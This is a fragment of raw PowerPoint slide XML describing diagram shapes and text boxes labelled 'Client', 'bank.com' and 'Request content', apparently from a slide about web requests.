              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CFFF5B4-65E3-044A-AA3A-A31080258F98}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="2874963"/>
            <a:ext cx="923925" cy="430212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156679" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EC9E343-A149-1444-9C23-ECD520EB2F7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="4981575"/>
            <a:ext cx="1760537" cy="15986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6680" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3922CA9E-1A3C-E042-8CB8-D2493598EBB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="15192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6681" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79F4FB49-63B4-7545-AC4C-FACE400CC0B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="1519237"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2176145"/>
              <a:gd name="T1" fmla="*/ 0 h 1905000"/>
              <a:gd name="T2" fmla="*/ 9833 w 2176145"/>
              <a:gd name="T3" fmla="*/ 0 h 1905000"/>
              <a:gd name="T4" fmla="*/ 9833 w 2176145"/>
              <a:gd name="T5" fmla="*/ 16453 h 1905000"/>
              <a:gd name="T6" fmla="*/ 0 w 2176145"/>
              <a:gd name="T7" fmla="*/ 16453 h 1905000"/>
              <a:gd name="T8" fmla="*/ 0 w 2176145"/>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6145" h="1905000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2176145" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217614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0" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A721412-C549-604B-9752-FBEA7BB1C2C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="2985" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="24"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="3600">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="89044">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="2500">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="156683" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5EA45B13-50DA-D945-94B9-80FE090B0FB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="1530350"/>
            <a:ext cx="1741487" cy="15795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6684" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2864B4DA-D71C-C548-95B6-B49311FDC0FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="1541463"/>
            <a:ext cx="1682750" cy="1517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3" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11097DC8-E6AC-BA46-BEF3-71155917745A}"/>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56686" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EEA80322-448A-754E-828F-9500494A63B8}"/>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6687" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C92BA2B8-55C0-F444-AF4B-4CDA974BB5A9}"/>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6688" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36202E39-81E4-0B42-B0B5-3BB3A590B086}"/>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6689" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70D6BD1D-000F-4D46-8C0B-291950CA7BAB}"/>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
        <p:nvSpPr>
          <p:cNvPr id="156690" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC44891C-A194-B945-A275-F8F3813FB56A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7312025" y="6151563"/>
            <a:ext cx="379413" cy="3635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6691" name="object 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84450A15-E5C2-C34E-9F6B-52B6B8AFCE0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340600" y="6161088"/>
            <a:ext cx="320675" cy="3032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6692" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F14EA8DA-62EB-6E41-867C-89090BEE111D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7340600" y="6161088"/>
            <a:ext cx="322263" cy="303212"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 415290"/>
              <a:gd name="T1" fmla="*/ 0 h 379729"/>
              <a:gd name="T2" fmla="*/ 2020 w 415290"/>
              <a:gd name="T3" fmla="*/ 0 h 379729"/>
              <a:gd name="T4" fmla="*/ 2020 w 415290"/>
              <a:gd name="T5" fmla="*/ 3364 h 379729"/>
              <a:gd name="T6" fmla="*/ 0 w 415290"/>
              <a:gd name="T7" fmla="*/ 3364 h 379729"/>
              <a:gd name="T8" fmla="*/ 0 w 415290"/>
              <a:gd name="T9" fmla="*/ 0 h 379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290" h="379729">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="415086" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="415086" y="379399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="379399"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FF2A0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BBD8AC2-4D38-3342-B71C-AE2C16798CDB}"/>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7699" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1CF1DB7-9E21-464C-86C4-3461EAD09961}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1287463" y="3395663"/>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00" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CCBD319-8DC9-5E48-A9B0-66A6F321AF1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="3405188"/>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01" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EF79B1F-E602-3141-9B74-B260545BC9F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1317625" y="3405188"/>
            <a:ext cx="1408113" cy="1517650"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1821814"/>
              <a:gd name="T1" fmla="*/ 0 h 1905000"/>
              <a:gd name="T2" fmla="*/ 8150 w 1821814"/>
              <a:gd name="T3" fmla="*/ 0 h 1905000"/>
              <a:gd name="T4" fmla="*/ 8150 w 1821814"/>
              <a:gd name="T5" fmla="*/ 16095 h 1905000"/>
              <a:gd name="T6" fmla="*/ 0 w 1821814"/>
              <a:gd name="T7" fmla="*/ 16095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18" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1821218"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4C4152CD-58FE-1541-A820-6530ABD77D50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1581150" y="4017963"/>
            <a:ext cx="1009650" cy="292100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">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latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1B8D301-ED65-CC48-9A6F-0268C1E03BF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1562100" y="2874963"/>
            <a:ext cx="923925" cy="430212"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="9949">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2800" spc="-4" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157704" name="object 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E919FA1-D601-BD47-B8AD-B0D7EA13A493}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="4981575"/>
            <a:ext cx="1760537" cy="15986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05" name="object 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EC35E329-DAC6-964D-AE43-1687C98E4D84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="15192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06" name="object 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D457AB8-6BEE-7043-B015-E8A88E0B73B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="1519237"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 2176145"/>
              <a:gd name="T1" fmla="*/ 0 h 1905000"/>
              <a:gd name="T2" fmla="*/ 9833 w 2176145"/>
              <a:gd name="T3" fmla="*/ 0 h 1905000"/>
              <a:gd name="T4" fmla="*/ 9833 w 2176145"/>
              <a:gd name="T5" fmla="*/ 16453 h 1905000"/>
              <a:gd name="T6" fmla="*/ 0 w 2176145"/>
              <a:gd name="T7" fmla="*/ 16453 h 1905000"/>
              <a:gd name="T8" fmla="*/ 0 w 2176145"/>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6145" h="1905000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2176145" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="217614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1" name="object 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF44E1CF-E2FD-1A4A-BB2A-C3D8958A4802}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6659563" y="5021263"/>
            <a:ext cx="1682750" cy="942975"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="2985" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="24"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr sz="3600" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="89044">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2500" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bank.com</a:t>
            </a:r>
            <a:endParaRPr sz="2500" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157708" name="object 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{117EF7DA-F50E-014F-8338-CB5BE3284D33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6630988" y="1530350"/>
            <a:ext cx="1741487" cy="15795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09" name="object 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C42BF90-BF7C-994A-B17D-D3E1564AF93D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6659563" y="1541463"/>
            <a:ext cx="1682750" cy="1517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4" name="object 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68236ECC-CA7F-9E4A-BD4F-2B689B493B5C}"/>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57711" name="object 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{500CA0C5-28F0-564E-A979-AE7C13CEB8DD}"/>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7712" name="object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC0FDCF2-ECC4-7149-9104-697B27D463DE}"/>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7713" name="object 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C37EF055-B33F-744F-859E-7A168339AB7B}"/>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7714" name="object 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A574442B-B10C-4942-AC34-CA0D6130F15B}"/>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
        <p:nvSpPr>
          <p:cNvPr id="157715" name="object 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{325DBB93-7039-1549-AA58-4208B29FD130}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6399213" y="5156200"/>
            <a:ext cx="263525" cy="227013"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 534 w 339725"/>
              <a:gd name="T1" fmla="*/ 0 h 284479"/>
              <a:gd name="T2" fmla="*/ 0 w 339725"/>
              <a:gd name="T3" fmla="*/ 2486 h 284479"/>
              <a:gd name="T4" fmla="*/ 1638 w 339725"/>
              <a:gd name="T5" fmla="*/ 2210 h 284479"/>
              <a:gd name="T6" fmla="*/ 534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110566" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="284048"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339318" y="252590"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1105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 name="object 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE86CBB8-87DE-8C49-B45E-B7AE902B7F35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1200000">
            <a:off x="3775075" y="4381500"/>
            <a:ext cx="2847975" cy="269875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="2127"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr sz="2300" spc="-4" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2300" spc="-63" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3400" spc="24" baseline="-1915" dirty="0">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:endParaRPr sz="3400" baseline="-1915" dirty="0">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="157717" name="object 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AB2B606-005F-8A4D-8A15-829489690DC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="3657600"/>
            <a:ext cx="365125" cy="376238"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 2125 w 471170"/>
              <a:gd name="T1" fmla="*/ 1221 h 471170"/>
              <a:gd name="T2" fmla="*/ 2197 w 471170"/>
              <a:gd name="T3" fmla="*/ 1622 h 471170"/>
              <a:gd name="T4" fmla="*/ 2225 w 471170"/>
              <a:gd name="T5" fmla="*/ 2029 h 471170"/>
              <a:gd name="T6" fmla="*/ 2210 w 471170"/>
              <a:gd name="T7" fmla="*/ 2432 h 471170"/>
              <a:gd name="T8" fmla="*/ 2155 w 471170"/>
              <a:gd name="T9" fmla="*/ 2819 h 471170"/>
              <a:gd name="T10" fmla="*/ 2061 w 471170"/>
              <a:gd name="T11" fmla="*/ 3179 h 471170"/>
              <a:gd name="T12" fmla="*/ 1932 w 471170"/>
              <a:gd name="T13" fmla="*/ 3502 h 471170"/>
              <a:gd name="T14" fmla="*/ 1769 w 471170"/>
              <a:gd name="T15" fmla="*/ 3774 h 471170"/>
              <a:gd name="T16" fmla="*/ 1575 w 471170"/>
              <a:gd name="T17" fmla="*/ 3989 h 471170"/>
              <a:gd name="T18" fmla="*/ 1361 w 471170"/>
              <a:gd name="T19" fmla="*/ 4124 h 471170"/>
              <a:gd name="T20" fmla="*/ 1144 w 471170"/>
              <a:gd name="T21" fmla="*/ 4175 h 471170"/>
              <a:gd name="T22" fmla="*/ 930 w 471170"/>
              <a:gd name="T23" fmla="*/ 4148 h 471170"/>
              <a:gd name="T24" fmla="*/ 724 w 471170"/>
              <a:gd name="T25" fmla="*/ 4044 h 471170"/>
              <a:gd name="T26" fmla="*/ 531 w 471170"/>
              <a:gd name="T27" fmla="*/ 3869 h 471170"/>
              <a:gd name="T28" fmla="*/ 360 w 471170"/>
              <a:gd name="T29" fmla="*/ 3626 h 471170"/>
              <a:gd name="T30" fmla="*/ 214 w 471170"/>
              <a:gd name="T31" fmla="*/ 3320 h 471170"/>
              <a:gd name="T32" fmla="*/ 100 w 471170"/>
              <a:gd name="T33" fmla="*/ 2955 h 471170"/>
              <a:gd name="T34" fmla="*/ 28 w 471170"/>
              <a:gd name="T35" fmla="*/ 2554 h 471170"/>
              <a:gd name="T36" fmla="*/ 0 w 471170"/>
              <a:gd name="T37" fmla="*/ 2147 h 471170"/>
              <a:gd name="T38" fmla="*/ 15 w 471170"/>
              <a:gd name="T39" fmla="*/ 1745 h 471170"/>
              <a:gd name="T40" fmla="*/ 71 w 471170"/>
              <a:gd name="T41" fmla="*/ 1357 h 471170"/>
              <a:gd name="T42" fmla="*/ 164 w 471170"/>
              <a:gd name="T43" fmla="*/ 997 h 471170"/>
              <a:gd name="T44" fmla="*/ 293 w 471170"/>
              <a:gd name="T45" fmla="*/ 675 h 471170"/>
              <a:gd name="T46" fmla="*/ 456 w 471170"/>
              <a:gd name="T47" fmla="*/ 401 h 471170"/>
              <a:gd name="T48" fmla="*/ 651 w 471170"/>
              <a:gd name="T49" fmla="*/ 188 h 471170"/>
              <a:gd name="T50" fmla="*/ 864 w 471170"/>
              <a:gd name="T51" fmla="*/ 52 h 471170"/>
              <a:gd name="T52" fmla="*/ 1080 w 471170"/>
              <a:gd name="T53" fmla="*/ 0 h 471170"/>
              <a:gd name="T54" fmla="*/ 1296 w 471170"/>
              <a:gd name="T55" fmla="*/ 28 h 471170"/>
              <a:gd name="T56" fmla="*/ 1502 w 471170"/>
              <a:gd name="T57" fmla="*/ 132 h 471170"/>
              <a:gd name="T58" fmla="*/ 1694 w 471170"/>
